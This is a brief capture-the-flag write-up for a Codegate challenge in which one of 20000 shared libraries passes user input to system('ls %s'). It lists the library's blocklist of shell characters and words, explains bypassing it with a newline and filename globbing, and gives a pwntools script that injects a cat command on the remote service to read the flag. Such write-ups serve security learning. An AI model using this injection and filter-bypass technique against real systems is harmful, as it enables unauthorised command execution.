Is this the vulnerable library?
We have one executable,
20000, and 20000 shared libs in the
The main executable will let you choose which of the 20000 libs to actually load, then run the
At a first look, most of the libs just immediately end execution with a call to
exit. With a combination of testing all libs automatically and dumb luck, we noticed that the
lib_2035.so lib calls
system("ls %s") with our input, instead of just exiting.
lib_2035.so though loads and runs
lib_5163.so, which prevent us from using the following characters and strings:
; * | & $ ` > < r v m p d "bin" "sh" "bash" f l g
Even with the filter, injecting arbitrary shell commands is easy, we just need to add an end-of-line character (
\n). To read the flag file we can just use globbing and bypass the
f l g filter.
#!/usr/bin/env python2 from pwn import * with remote('126.96.36.199', 15959) as p: p.recvuntil('INPUT : ') p.sendline('2035') p.recvuntil('file') p.sendline('"\ncat ????') p.interactive()
tags: codegate - ctf - mhackeroni - command-injection